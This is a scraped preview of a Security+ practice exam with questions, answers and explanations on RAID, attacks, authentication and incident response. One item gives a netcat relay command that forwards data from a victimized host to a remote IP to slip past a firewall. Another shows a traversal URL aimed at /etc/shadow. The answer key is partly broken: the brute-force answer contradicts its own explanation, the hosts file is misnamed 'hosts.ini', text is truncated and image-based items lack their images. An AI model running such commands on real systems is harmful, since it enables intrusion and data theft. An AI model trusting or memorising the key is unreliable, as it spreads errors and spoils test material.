Docsity
Docsity

Prepare for your exams
Prepare for your exams

Study with the several resources on Docsity


Earn points to download
Earn points to download

Earn points by helping other students or get them with a premium plan


Guidelines and tips
Guidelines and tips

Cybersecurity Concepts and Techniques, Exams of Computer Security

A wide range of cybersecurity topics, including raid configuration, buffer overflow exploits, brute force attacks, bluetooth technology, data injection, apt attacks, insider threats, privilege escalation, shoulder surfing, least privilege, security through obscurity, sms authentication, virtualization, access control methods, data loss prevention, identity management, routing protocols, security orchestration and response, data clearing, insider threats, data exfiltration, vulnerability management, and data correlation. A comprehensive overview of various cybersecurity concepts, techniques, and best practices, making it a valuable resource for students, security professionals, and lifelong learners interested in understanding the fundamentals of cybersecurity.

Typology: Exams

2024/2025

Available from 10/13/2024

zaza-maica
zaza-maica 🇬🇧

3

(2)

1.2K documents

Partial preview of the text

Download Cybersecurity Concepts and Techniques and more Exams Computer Security in PDF only on Docsity!

Jason Udemy CompTIA Security+ (SY0-

601) Practice Exam #3 2024-2025. Quizs

& Correct Ans. Graded A+

(Sample Simulation - On the real exam for this type of question, you may receive a list of different RAID types and be asked to visually display which hard drives in the RAID are used for redundant data storage as either a stripe or a mirror. You will then have to identify which RAID type is most appropriate for each type of server shown.) You are configuring a RAID drive for a Media Streaming Server. Your primary concern is the speed of delivery of the data. This server has two hard disks installed. What type of RAID should you install, and what type of data will be stored on Disk 1 and Disk 2? RAID 0 - Disk 1 (Stripe) and Disk 2 (Stripe) RAID 1 - Disk 1 (Mirror) and Disk 2 (Mirror) (Incorrect) RAID 1 - Disk 1 (Stripe) and Disk 2 (Stripe) RAID 0 - Disk 1 (Mirror) and Disk 2 (Mirror) - ANSRAID 0 - Disk 1 (Stripe) and Disk 2 (Stripe) OBJ-2.5: Since this is a Media Streaming Server, you should implement a RAID 0, which provides disk stripping across both drives. This will increase the speed of the data delivery but provides no redundancy. If you were concerned with redundancy, then you should choose a RAID 1, which uses a mirror of the data on both hard disks. You cannot use a RAID 5 since it requires a minimum of 3 disk drives and stripes the data across the hard disks. You also can not use a RAID 6 since this requires at least 4 hard disks with dual parity and disk stripping. A RAID 10 also requires 4 hard disks and is a mirror of striped drives (combining the benefits of RAID 1 and RAID 0). A customer brought in a computer that has been infected with a virus. Since the infection, the computer began redirecting all three of the system's web browsers to a series of malicious

websites whenever a valid website is requested. You quarantined the system, disabled the system restore, and then perform the remediation to remove the malware. You have scanned the machine with several anti-virus and anti-malware programs and determined it is now cleaned of all malware. You attempt to test the web browsers again, but a small number of valid websites are still being redirected to a malicious website. Luckily, the updated anti-virus you installed blocked any new malware from infecting the system. Which of the following actions should you perform NEXT to fix the redirection issue with the browsers? Reformat the system and reinstall the OS Verify the hosts file has not been maliciously modified Perform a System Restore t - ANSVerify the hosts file has not been maliciously modified OBJ- 1.4: Browser redirection usually occurs if the browser's proxy is modified or the hosts.ini file is modified. If the redirection occurs only for a small number of sites or occurs in all web browsers on a system, it is most likely a maliciously modified hosts.ini file. The hosts.ini file is a local file that allows a user to specify specific domain names to map to particular addresses. It works as an elementary DNS server and can redirect a system's internet connection. For example, if your children are overusing YouTube, you can change YouTube.com to resolve to YourSchool.edu for just your child's laptop. A cybersecurity analyst conducts an incident response at a government agency when she discovers that attackers had exfiltrated PII. Which of the following types of breaches has occurred? Financial breach Privacy breach Proprietary breach Integrity breach - ANSPrivacy breach OBJ-4.5: A data breach is an incident where information is stolen or taken from a system without the system's owner's knowledge or authorization. If sensitive personally identifiable information (PII) was accessed or exfiltrated, then a privacy breach has occurred. If information

like trade secrets were accessed or exfiltrated, then a proprietary breach has occurred. If any data is modified or altered, then an integrity breach has occurred. If any information related to payroll, tax returns, banking, or investments is accessed or exfiltrated, then a financial breach has occurred. A cybersecurity analyst is attempting to classify network traffic within an organization. The analyst runs the tcpdump command and receives the following output: Which of the following statements is true based on this output? 10.0.19.121 is a client that is accessing an SSH server over port 52497 11.154.12.121 is under attack from a host at 10.0.19. 11.154.12.121 is a client that is accessing an SSH server over port 52497 (Incorrect) 10.0.19.121 is under attack from a host at 11.154.12.121 - ANS10.0.19.121 is a client that is accessing an SSH server over port 52497 OBJ-4.1: This output from the tcpdump command is displaying three packets in a larger sequence of events. Based solely on these three packets, we can only be certain that the server (11.154.12.121) runs an SSH server over port 22. This is based on the first line of the output. The second and third lines are the server responding to the request and sending data back to the client (10.0.19.121) over port 52497. There is no evidence of an attack against either the server or the client based on this output since we can only see the headers and not the content being sent between the client and server. A cybersecurity analyst is reviewing the logs of a proxy server and saw the following URL, http://test.diontraining.com/../../../../etc/shadow. What type of attack has likely occurred? Buffer overflow Directory traversal SQL injection XML injection - ANSDirectory traversal OBJ-1.3: This is an example of a directory traversal. A directory traversal attack aims to access files and directories that are stored outside the webroot folder. By manipulating variables or URLs that reference files with "dot-

dot-slash (../)" sequences and its variations or using absolute file paths, it may be possible to access arbitrary files and directories stored on the file system, including application source code or configuration and critical system files. A buffer overflow is an exploit that attempts to write data to a buffer and exceed that buffer's boundary to overwrite an adjacent memory location. XML Injection is an attack technique used to manipulate or compromise an XML application or service's logic. SQL injection is the placement of malicious code in SQL statements via web page input. A cybersecurity analyst is reviewing the logs of an authentication server and saw the following output: What type of attack was most likely being attempted by the attacker? Impersonation Password spraying (Incorrect) Credential stuffing Brute force - ANSBrute Force OBJ-1.2: This is an example of a brute force attack. Unlike password spraying that focuses on attempting only one or two passwords per user, a brute force attack focuses on trying multiple passwords for a single user. The goal of this attack is to crack the user's password and gain access to their account. Password spraying, instead, refers to the attack method that takes a large number of usernames and loops them with a single password. We can use multiple iterations using several different passwords, but the number of passwords attempted is usually low compared to the number of users attempted. This method avoids password lockouts, and it is often more effective at uncovering weak passwords than targeting specific users. In the scenario provided, only one or two attempts are being made to each username listed. This is indicative of a password spraying attack instead of a brute force attempt against a single user. Impersonation is the act of pretending to be another person for fraudulent purposes. Credential stuffing is the automated injection of breached username/password pairs to gain user accounts access

fraudulently. This is a subset of the brute force attack category: large numbers of spilled credentials are automatically entered into websites until they are potentially matched to an existing account. The attacker can then hijack the account for their purposes. A macOS user is browsing the internet in Google Chrome when they see a notification that says, "Windows Enterprise Defender: Your computer is infected with a virus, please click here to remove it!" What type of threat is this user experiencing? Pharming Worm Rogue anti-virus Phishing - ANSRogue anti-virus OBJ- 1.1: Rogue anti-virus is a form of malicious software and internet fraud that misleads users into believing there is a virus on their computer and to pay money for a fake malware removal tool (that actually introduces malware to the computer). It is a form of scareware that manipulates users through fear and a form of ransomware. Since the alert is being displayed on a macOS system but appears to be meant for a Windows system, it is obviously a scam or fake alert and most likely a rogue anti- virus attempting to infect the system. Phishing is an email-based social engineering attack in which the attacker sends an email from a supposedly reputable source, such as a bank, to try to elicit private information from the victim. Phishing attacks target an indiscriminate large group of random people. A worm is a standalone malware computer program that replicates itself to spread to other computers. Often, it uses a computer network to spread itself, relying on security failures on the target computer to access it. A worm can spread on its own, whereas a virus needs a host program or user interaction to propagate itself. Pharming is a type of social engineering attack that redirects a request for a website, typically an e-commerce site, to a similar-looking, but fake, website. The attacker uses DNS spoofing to redirect the user to the fake site. A new smartphone supports users' ability to

transfer a photograph by simply placing their phones near each other and "tapping" the two phones together. What type of technology does this most likely rely on? BT NFC RF IR - ANSNFC OBJ-1.4: Near-field communication (NFC) is a set of communication protocols that enable two electronic devices, one of which is usually a portable device such as a smartphone, to establish communication by bringing them within 4 cm of each other. This is commonly used for contactless payment systems, transferring contacts, or transferring a file from one device to another. Bluetooth (BT) is a wireless technology standard used for exchanging data between fixed and mobile devices over short distances using UHF radio waves in the industrial, scientific, and medical radio bands from 2.402 GHz to 2.480 GHz and building a personal area network (PAN). Bluetooth is commonly used when connecting wireless devices like mice, trackpads, headphones, and other devices. Infrared (IR) was a wireless networking standard supporting speeds up to about 4 Mbps with a direct line of sight for communications. Infrared sensors are used in mobile devices and with IR blasters to control appliances. While infrared (IR) used to be commonly used to connect wireless mice and keyboards to a laptop in the 1990s, it has fallen out of favor in the last 10-15 years since Bluetooth is more reliable and does not require a direct line of sight between the device and the laptop. Radio frequency (RF) is the propagation of radio waves at different frequencies and wavelengths. For example, Wi-Fi network products use a frequency of either 2.4 GHz or 5 GHz. A penetration tester has issued the following command on a victimized host: nc -l -p 8080 | nc 192.168.1.76 443. What will occur based on this command? Netcat will listen on port 8080 and output anything received to a remote connection on 192.168.1.76 port 443 Netcat will listen for a connection from 192.168.1.76 on

port 443 and output anything received to port 8080 Netcat will listen on port 8080 and then output anything received to local interface 192.168.1.76 Netcat will listen on the 192.168.1.76 interface for 443 seconds on port 8080 - ANSNetcat will listen on port 8080 and output anything received to a remote connection on 192.168.1. port 443 OBJ-4.1: The proper syntax for netcat (nc) is -l to signify listening and -p to specify the listening port. Then, the | character allows multiple commands to execute during a single command's execution. Next, netcat sends the data to the given IP (192.168.1.76) over port 443. This is a common technique to bypass the firewall by sending traffic over port 443 (a secure SSL/TLS tunnel). A software assurance laboratory performs a dynamic assessment on an application by automatically generating random data sets and inputting them to cause an error or failure condition. Which of the following is the laboratory performing? Stress testing Fuzzing User acceptance testing Security regression testing - ANSFuzzing OBJ-3.2: Fuzzing or fuzz testing is an automated software testing technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions such as crashes, failing built-in code assertions, or potential memory leaks. User Acceptance Testing is the process of verifying that a created solution/software works for the user. Security regression testing ensures that changes made to a system do not harm its security, are therefore of high significance, and the interest in such approaches has steadily increased. Stress testing verifies the system's stability and reliability by measuring its robustness and error handling capabilities under heavy load conditions. A software assurance test analyst performs a dynamic assessment on an application by automatically generating random data sets and inputting them in an attempt to

cause an error or failure condition. Which technique is the analyst utilizing? Static code analysis Known bad data injection Fuzzing Sequential data sets - ANSFuzzing OBJ-3.2: Fuzzing is an automated software assessment technique that involves providing invalid, unexpected, or random data as inputs to a computer program. The program is then monitored for exceptions (crashes), failing built-in code assertions, or finding potential memory leaks. Static code analysis is a method of debugging by examining source code before a program is run. Known bad data injection is a technique where data known to cause an exception or fault is entered as part of the testing / assessment with known bad data injections. You would not use randomly generated data sets, though. After analyzing and correlating activity from the firewall logs, server logs, and the intrusion detection system logs, a cybersecurity analyst has determined that a sophisticated breach of the company's network security may have occurred from a group of specialized attackers in a foreign country over the past five months. Up until now, these cyberattacks against the company network had gone unnoticed by the company's information security team. How would you best classify this threat? Insider threat Advanced persistent threat (APT) Spear phishing Privilege escalation - ANSAdvanced persistent threat (APT) OBJ-1.5: An advanced persistent threat (APT) is a network attack in which an unauthorized person gains access to a network and stays there undetected for a long period of time. An APT attack intends to steal data rather than to cause damage to the network or organization. An APT refers to an adversary's ongoing ability to compromise network security, obtain and maintain access, and use various tools and techniques. They are often supported and funded by nation-states or work directly for a nation-states' government. Spear phishing is the fraudulent practice of sending emails ostensibly from a known or

trusted sender to induce targeted individuals to reveal confidential information. An insider threat is a malicious threat to an organization from people within the organization, such as employees, former employees, contractors, or business associates, who have inside information concerning the organization's security practices, data, and computer systems. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. While an APT may use spear phishing, privilege escalation, or an insider threat to gain access to the system, the scenario presented in this question doesn't specify what method was used. Therefore, APT is the best answer to select. An electronics store was recently the victim of a robbery where an employee was injured, and some property was stolen. The store's IT department hired an external supplier to expand its network to include a physical access control system. The system has video surveillance, intruder alarms, and remotely monitored locks using an appliance-based system. Which of the following long-term cybersecurity risks might occur based on these actions? These devices are insecure and should be isolated from the internet These devices should be scanned for viruses before installation These devices should be isolated from the rest of the enterprise network There are no new risks due to the install and the company has a stronger physical security posture - ANSThese devices should be isolated from the rest of the enterprise network OBJ-2.6: While the physical security posture of the company has been improved by adding the cameras, alarms, and locks, this appliance-based system may pose additional risks to the store's network. Specialized technology and appliance-based systems rarely receive security updates at the same rate as regular

servers or endpoints. These devices need to be on a network to ensure that their network functions can continue, but they don't necessarily need to be on the enterprise production network. A good option would be to set up a parallel network that is physically or logically isolated from the enterprise network and install the video cameras, alarms, and lock on that one. These devices cannot be isolated from the internet without compromising their functions, such as allowing remote monitoring of the system and locks. The devices should be scanned for viruses before installation, but that is a short-term consideration and doesn't protect them long-term. An ethical hacker has been hired to conduct a physical penetration test of a company. During the first day of the test, the ethical hacker dresses up like a plumber and waits in the building's main lobby until an employee goes through the main turnstile. As soon as the employee enters his access number and proceeds to go through the turnstile, the ethical hacker follows them through the access gate. What type of attack did the ethical hacker utilize to access the restricted area of the building? Social engineering Spoofing Shoulder surfing Tailgating - ANSTailgating OBJ- 1.1: Based on the description, the ethical hacker conducted a very specialized type of social engineering attack known as tailgating. Sometimes on a certification exam, there are two correct answers, but one is more correct. This question is an example of that concept. Tailgating involves someone who lacks the proper authentication following an employee into a restricted area. Social engineering uses deception to manipulate individuals into divulging confidential or personal information that may be used for fraudulent purposes. Shoulder surfing is a type of social engineering technique used to obtain personal identification numbers (PINs), passwords, and other confidential data by looking over the victim's shoulder. Spoofing is the act of

disguising a communication from an unknown source as being from a known, trusted source. An independent cybersecurity researcher has contacted your company to prove a buffer overflow vulnerability exists in one of your applications. Which technique would have been most likely to identify this vulnerability in your application during development? Dynamic code analysis (Incorrect) Pair programming Static code analysis Manual Peer Review - ANSStatic code analysis OBJ- 3.4: Buffer overflows are most easily detected by conducting a static code analysis. Manual peer review or pair programming methodologies might have been able to detect the vulnerability. Still, they do not have the same level of success as a static code analysis using proper tools. DevSecOps methodology would also improve the likelihood of detecting such an error but still rely on human-to-human interactions and human understanding of source code to detect the fault. Dynamic code analysis also may have detected this if the test found exactly the right condition. Still, again, a static code analysis tool is designed to find buffer overflows more effectively. An internet marketing company decided that they didn't want to follow the rules for GDPR because it would create too much work for them. They wanted to buy insurance, but no insurance company would write them a policy to cover any fines received. They considered how much the fines might be and decided to ignore the regulation and its requirements. Which of the following risk strategies did the company choose? Avoidance (Incorrect) Transference Mitigation Acceptance - ANSAcceptance OBJ-5.4: The internet marketing company initially tried to transfer the risk (buy insurance) but then decided to accept the risk. To avoid the risk, the company would have changed how it did business or would prevent European customers from signing up on their mailing list using geolocation blocks. As a

cybersecurity analyst conducting vulnerability scans, you have just completed your first scan of an enterprise network comprising over 10,000 workstations. As you examine your findings, you note that you have less than 1 critical finding per 100 workstations. Which of the following statement does BEST explain these results? An uncredentialed scan of the network was performed The scanner failed to connect with the majority of workstations The network has an exceptionally strong security posture The scanner was not compatible with the devices on your network - ANSAn uncredentialed scan of the network was performed OBJ-1.7: Uncredentialed scans are generally unable to detect many vulnerabilities on a device. When conducting an internal assessment, you should perform an authenticated (credentialed) scan of the environment to most accurately determine the network's vulnerability posture. In most enterprise networks, if a vulnerability exists on one machine, it also exists on most other workstations since they use a common baseline or image. If the scanner failed to connect to the workstations, an error would have been generated in the report. Christina is auditing the security procedures related to the use of a cloud- based online payment service. She notices that the access permissions are set so that a single person can not add funds to the account and transfer funds out of the account. What security principle is most closely related to this scenario? Security through obscurity Dual control authentication Separation of duties Least privilege (Incorrect) - ANSSeparation of duties OBJ-5.3: Separation of duties is the concept of having more than one person required to complete a task. In business, the separation by sharing more than one individual in a single task is an internal control intended to prevent fraud and error. In this case, one person can transfer money in, while another must transfer money out. Dual control authentication is used when

performing a sensitive action and requires two different users to log in. Least privilege is the concept and practice of restricting access rights for users, accounts, and computing processes to only those resources required to perform routine, legitimate activities. Security through obscurity is the reliance on security engineering in design or implementation by using secrecy as the main method of providing security to a system or component. Dion Training has just completed an assessment as part of its disaster recovery planning. The assessment found that the organization can only tolerate a maximum of 30 minutes of downtime for their public-facing webserver. Which of the following metrics would best represent this period of time? RPO MTTR RTO MTBF - ANSRTO OBJ-5.4: The Recovery Time Objective (RTO) is the targeted duration of time and a service level within which a business process must be restored after a disaster (or disruption) to avoid unacceptable consequences associated with a break in business continuity. In this example, 30 minutes would be the RTO. Dion Training is currently undergoing an audit of its information systems. The auditor wants to understand better how the PII data from a particular database is used within business operations. Which of the following employees should the auditor interview? Data steward Data owner Data protection officer Data controller - ANSData protection officer OBJ-5.5: The primary role of the data protection officer (DPO) is to ensure that her organization processes the personal data of its staff, customers, providers, or any other individuals (also referred to as data subjects) in compliance with the applicable data protection rules. They must understand how any privacy information is used within business operations. Therefore, they are the best person for the auditor to interview to get a complete picture of the data usage. Dion Training's offices utilize an open concept

floor plan. They are concerned that a visitor might attempt to steal an external hard drive and carry it out of the building. To mitigate this risk, the security department has recommended installing security cameras clearly visible to both employees and visitors. What type of security control do these cameras represent? Corrective Administrative Compensating Deterrent - ANSDeterrent OBJ-5.1: A deterrent control is designed to discourage the violation of a security policy. Since the cameras are clearly visible, they are acting as a deterrent control. Corrective control is one that is used to fix or eliminate a vulnerability. A compensating control is used to minimize a vulnerability when it is deemed too difficult or impractical to correct the vulnerability fully. Administrative control is used to create a policy or procedure to minimize or eliminate a vulnerability. During her login session, Sally is asked by the system for a code sent to her via text (SMS) message. Which of the following concerns should she raise to her organization's AAA services manager? SMS messages may be accessible to attackers via VoIP or other systems SMS should be paired with a third factor SMS is a costly method of providing a second factor of authentication SMS should be encrypted to be secure - ANSSMS messages may be accessible to attackers via VoIP or other systems OBJ-2.4: NIST's SP 800-63-3 recommends that SMS messages be deprecated as a means of delivering a second factor for multifactor authentication because they may be accessible to attackers. SMS is unable to be encrypted (at least without adding additional applications to phones). A third factor is typically not a user-friendly recommendation and would be better handled by replacing SMS with the proposed third factor. SMS is not a costly method since it can be deployed for less than $20/month at scale. During which incident response phase is the preservation of evidence performed? Post-incident activity Containment,

eradication, and recovery Preparation Detection and analysis - ANSContainment, eradication, and recovery OBJ-4.2: A cybersecurity analyst must preserve evidence during the containment, eradication, and recovery phase. They must preserve forensic and incident information for future needs, prevent future attacks or bring up an attacker on criminal charges. Restoration and recovery are often prioritized over analysis by business operations personnel, but taking time to create a forensic image is crucial to preserve the evidence for further analysis and investigation. During the preparation phase, the incident response team conducts training, prepares their incident response kits, and researches threats and intelligence. During the detection and analysis phase, an organization focuses on monitoring and detecting any possible malicious events or attacks. During the post-incident activity phase, the organization conducts after-action reports, creates lessons learned, and conducts follow-up actions to better prevent another incident from occurring. Following a root cause analysis of an edge router's unexpected failure, a cybersecurity analyst discovered that the system administrator had purchased the device from an unauthorized reseller. The analyst suspects that the router may be a counterfeit device. Which of the following controls would have been most effective in preventing this issue? Ensure all anti-virus signatures are up to date Verify that all routers are patched to the latest release Conduct secure supply chain management training Increase network vulnerability scan frequency - ANSConduct secure supply chain management training OBJ-5.3: Anti-counterfeit training is part of the NIST 800- 53r4 control set (SA-19(1)) and should be a mandatory part of your supply chain management training within your organization. All other options may produce security gains in the network. They are unlikely to reliably detect a counterfeit item

or prevent its introduction into the organization's supply chain. Training on detection methodologies (i.e., simple visual inspections) and training for acquisition personnel will better prevent recurrences. How would you appropriately categorize the authentication method being displayed here? One-time password authentication Multifactor authentication Biometric authentication PAP authentication - ANSPAP authentication OBJ-2.4: For the exam, you need to know the different authentication categories and what type of authentication methods belong to each category. A username and password are used as part of the Password Authentication Protocol (PAP) authentication system. A username and password are also considered a knowledge factor in an authentication system. How would you appropriately categorize the authentication method being displayed here? PAP authentication Multifactor authentication One-time password authentication Biometric authentication - ANSMultifactor authentication OBJ-2.4: For the exam, you need to know the different authentication categories and what type of authentication methods belong to each category. This is an example of multifactor authentication because you are using both a username/password combination with an SMS code. This provides a knowledge factor (username/password) and a possession factor (your smartphone) to provide two factors of authentication, making this the best option. In which type of attack does the attacker begin with a normal user account and then seek additional access rights? Remote code exploitation Privilege escalation Spear phishing Cross-site scripting - ANSPrivilege escalation OBJ-1.8: Privilege escalation attacks seek to increase the access level that an attacker has to a target system. Privilege escalation is the act of exploiting a bug, design flaw, or configuration oversight in an operating system or software application to gain

elevated access to resources that are normally protected from an application or user. Spear phishing is an email or electronic communications scam targeted towards a specific individual, organization, or business. Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted websites. Remote code execution is the ability an attacker has to access someone else's computing device and make changes, no matter where the device is geographically located. Jason has installed multiple virtual machines on a single physical server. He needs to ensure that the traffic is logically separated between each virtual machine. How can Jason best implement this requirement? Create a virtual router and disable the spanning tree protocol Configure a virtual switch on the physical server and create VLANs Install a virtual firewall and establish an access control list Conduct system partitioning on the physical server to ensure the virtual disk images are on different partitions - ANSConfigure a virtual switch on the physical server and create VLANs OBJ-3.3: A virtual switch is a software application that allows communication between virtual machines. A virtual local area network (VLAN) is a hardware-imposed network segmentation created by switches. This solution provides a logical separation of each virtual machine through the use of VLANs on the virtual switch. Julie was just hired to conduct a security assessment of Dion Training's security policies. During her assessment, she noticed that many users were sharing group accounts to conduct their work roles. Julie recommended that the group accounts be eliminated and instead have an account created for each user. What improvement will this recommended action provide for the company? Increase individual accountability More routing auditing Increase password security More efficient baseline management - ANSIncrease individual accountability OBJ-5.3:

To adequately provide accountability, the use of shared or group accounts should be disabled. This allows you to log and track individual user actions based on individual user accounts. This enables the organization to hold users accountable for their actions, too. Susan, a help desk technician at Dion Training, has received several trouble tickets today related to employees receiving the same email as part of a phishing campaign. She has determined that the email's malicious link is not being blocked by the company's security suite when a user clicks the link. Susan asked you what action can be performed to prevent a user from reaching the website associated with the phishing email's malicious link. What action do you recommend she utilize? Add the malicious domain name to your content filter and web proxy's block list Forward this phishing email to all employees with a warning not to click on the embedded links Block the IP address of the malicious domain in your firewall's ACL (Incorrect) Enable TLS on your organization's mail server - ANSAdd the malicious domain name to your content filter and web proxy's block list OBJ-3.3: To prevent a user from accessing the malicious website when the link is clicked, the malicious domain name should be added to the blocklist of the company's content filter and web proxy. This will ensure that no devices on the network can reach the malicious domain name. While blocking the IP address associated with the domain name might help for a short period of time, the malicious domain's owner could quickly redirect the DNS to point to a different IP. Then the users would still be able to access the malicious domain and its contents. Enabling TLS on the mail server will only encrypt the connection between the email server and its clients. Still, it will not prevent the users from clicking on the malicious link and accessing the malicious content. While informing the users that there is an active attempt at phishing being conducted

against the organization is a good idea, forwarding the phishing email with the malicious link will generally cause more users to accidentally click on the malicious link, which further exacerbates the issue. The digital certificate on the Dion Training web server is about to expire. Which of the following should Jason submit to the CA to renew the server's certificate? OCSP Key escrow CSR CRL - ANSCSR OBJ-3.9: A CSR (certificate signing request) is what is submitted to the CA (certificate authority) to request a digital certificate. Key escrow stores keys, CRL is a list of revoked certificates, and the OCSP is a status of certificates that provide validity such as good, revoked, or unknown. Tim, a help desk technician, receives a call from a frantic executive who states that their company-issued smartphone was stolen during their lunch meeting with a rival company's executive. Tim quickly checks the MDM administration tool and identifies that the user's smartphone is still communicating with the MDM, and displays its location on a map. What should Tim do next to ensure the stolen device's data remains confidential and inaccessible to the thief? Perform a remote wipe of the device Remotely encrypt the device Identify the IP address of the smartphone Reset the device's password - ANSPerform a remote wipe of the device OBJ-3.5: To ensure the data remains confidential and is not accessed by the thief, Tim should perform a remote wipe of the device from the MDM. This will ensure any corporate data is erased before anyone accesses it. Additionally, Tim could reset the device's password, but if the thief could guess or crack the password, they would have access to the data. Identifying the smartphone's IP address is not a useful step in protecting the data on the device. Additionally, devices should be encrypted BEFORE they are lost or stolen, not after. Therefore, the option to remotely encrypt the device is provided as a wrong answer and a distractor. To

improve the Dion Training corporate network's security, a security administrator wants to update the configuration of their wireless network to have IPSec built into the protocol by default. Additionally, the security administrator would like for NAT to no longer be required for extending the number of IP addresses available. What protocol should the administrator implement on the wireless network to achieve their goals? IPv6 IPv4 WEP WPA2 - ANSIPv6 OBJ-3.1: IPv6 includes IPsec built into the protocol by default. Additionally, IPv6 also provides an extended IP address range for networks, eliminating the need for using NAT. IPv4 does not include IPsec or extended IP address ranges by default. WPA2 is the most modern and secure version of wireless encryption for WiFi networks, but it doesn't include IPsec or extended IP address ranges by default. WEP is an older version of wireless encryption for WiFi networks and doesn't provide these features by default, either. Using the image provided, place the port numbers in the correct order with their associated protocols: 161, 22, 110, 23 22, 110, 161, 23 23, 110, 22, 161 110, 161, 23, 22 - ANS22, 110, 161, 23 OBJ-3.1: For the exam, you need to know your ports and protocols. The Secure Copy (SCP) operates over port 22. Telnet operates over port

  1. The Simple Network Management Protocol (SNMP) operates over port 161. The Post Office Protocol 3 (POP3) operates over port 110. Using the image provided, select four security features that you should use to best protect your servers in the data center. This can include physical, logical, or administrative protections. Antivirus, Mantrap, Cable lock, GPS tracking GPS tracking, Biometrics, Proximity badges, Remote wipe Strong passwords, Biometrics, Mantrap, Cable lock (Incorrect) FM-200, Biometric locks, Mantrap, Antivirus - ANSFM-200, Biometric locks, Mantrap, Antivirus OBJ-2.7: The best option based on your choices is FM-200, Biometric locks,

Mantrap, and Antivirus. FM-200 is a fire extinguishing system commonly used in data centers and server rooms to protect the servers from fire. Biometric locks are often used in high-security areas as a lock on the access door. Additionally, biometric authentication could be used for a server by using a USB fingerprint reader. Mantraps often are used as part of securing a data center as well. This area creates a boundary between a lower security area (such as the offices) and the higher security area (the server room). Antivirus should be installed on servers since they can use signature-based scans to ensure files are safe before being executed. What containment technique is the strongest possible response to an incident? Isolating affected systems Isolating the attacker Enumeration Segmentation - ANSIsolating affected systems OBJ-4.4: Isolation involves removing an affected component from whatever larger environment it is a part of. This can be everything from removing a server from the network after it has been the target of a DoS attack, placing an application in a sandbox virtual machine (VM) outside of the host environments it usually runs on. Segmentation-based containment is a means of achieving the isolation of a host or group of hosts using network technologies and architecture. Segmentation uses VLANs, routing/subnets, and firewall ACLs to prevent a host or group of hosts from communicating outside the protected segment. Removal is not an industry term used but would be a synonym for isolation. Enumeration is defined as the process of extracting usernames, machine names, network resources, shares, and services from a system. Isolating the attacker would only stop their direct two- way communication and control of the affected system. However, it would not be the strongest possible response since there could be malicious code still running on your victimized machine. What is the lowest layer (bottom layer) of a bare-metal

virtualization environment? Host operating system Physical hardware Hypervisor Guest operating system - ANSPhysical hardware OBJ-2.2: The bottom layer is physical hardware in this environment. It is what sits beneath the hypervisor and controls access to guest operating systems. The bare-metal approach doesn't have a host operating system. A hypervisor is a program used to run and manage one or more virtual machines on a computer. A host operating system is an operating system that is running the hypervisor. A host operating system is an operating system that is running the hypervisor. What is used as a measure of biometric performance to rate the system's ability to correctly authenticate an authorized user by measuring the rate that an unauthorized user is mistakenly permitted access? Crossover error rate False acceptance rate Failure to capture False rejection rate - ANSFalse acceptance rate OBJ-2.4: False acceptance rate (FAR), or Type II, is the measure of the likelihood that the biometric security system will incorrectly accept an access attempt by an unauthorized user. The false rejection rate is calculated based upon the number of times an authorized user is denied access to the system. What problem can you solve by using Wireshark? Performing packet capture and analysis on a network Tracking source code version changes Validating the creation dates of web pages on a server Resetting the administrator password on three different server - ANSPerforming packet capture and analysis on a network OBJ-4.1: Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis, software and communications protocol development, and education. It cannot perform any of the other three options. What type of malware changes its binary pattern in its code on specific dates or times to avoid detection by antimalware software? Logic bomb (Incorrect) Ransomware Polymorphic virus

Trojan - ANSPolymorphic virus OBJ-1.2: A polymorphic virus alters its binary code to avoid detection by antimalware scanners that rely on signature-based detection. By changing its signature, the virus can avoid detection. What type of weakness is John the Ripper used to test during a technical assessment? File permissions Passwords Usernames Firewall rulesets - ANSPasswords OBJ-4.1: John the Ripper is a free, open-source password cracking software tool. It tests the strength of passwords during a technical assessment. John the Ripper supports both dictionary and brute force attacks. When you purchase an exam voucher at diontraining.com, the system only collects your name, email, and credit card information. Which of the following privacy methods is being used by Dion Training? Anonymization Tokenization Data masking Data minimization - ANSData minimization OBJ-5.5: Data minimization involves limiting data collection to only what is required to fulfill a specific purpose. Reducing what information is collected reduces the amount and type of information that must be protected. Since we only need your name and email to deliver the voucher and your credit card to receive payment for the voucher, we do not collect any additional information, such as your home address or phone number. Data masking can mean that all or part of a field's contents are redacted, by substituting all character strings with x, for example. Tokenization means that all or part of data in a field is replaced with a randomly generated token. The token is stored with the original value on a token server or token vault, separate from the production database. An authorized query or app can retrieve the original value from the vault, if necessary, so tokenization is a reversible technique. Data anonymization is the process of removing personally identifiable information from data sets so that the people whom the data describe remain anonymous. Which cloud computing concept

is BEST described as focusing on the replacement of applications and programs on a customer's workstation with cloud-based resources? IaaS DaaS SaaS PaaS - ANSSaaS OBJ-2.2: Software as a Service (SaaS) is ca loud computing service that enables a service provider to make applications available over the Internet to end-users. This can be a calendar, scheduling, invoicing, word processor, database, or other programs. For example, Google Docs and Office 365 are both word processing SaaS solutions. Infrastructure as a Service (IaaS) is a cloud computing service that enables a consumer to outsource computing equipment purchases and running their own data center. Platform as a Service (PaaS) is a cloud computing service that enables consumers to rent fully configured systems that are set up for specific purposes. Desktop as a Service (DaaS) provides a full virtualized desktop environment from within a cloud-based service. This is also known as VDI (Virtualized Desktop Infrastructure) and is coming in large enterprise businesses focused on increasing their security and minimizing their operational expenses Which of the following access control methods utilizes a set of organizational roles in which users are assigned to gain permissions and access rights? RBAC MAC ABAC DAC - ANSRBAC OBJ-3.8: Role-based access control (RBAC) is a modification of DAC that provides a set of organizational roles that users may be assigned to gain access rights. The system is non-discretionary since the individual users cannot modify the ACL of a resource. Users gain their access rights implicitly based on the groups to which they are assigned as members. Which of the following biometric authentication factors uses an infrared light shone into the eye to identify the pattern of blood vessels? Pupil dilation Facial recognition Retinal scan Iris scan - ANSRetinal scan Which of the following categories would contain information about a French citizen's race or

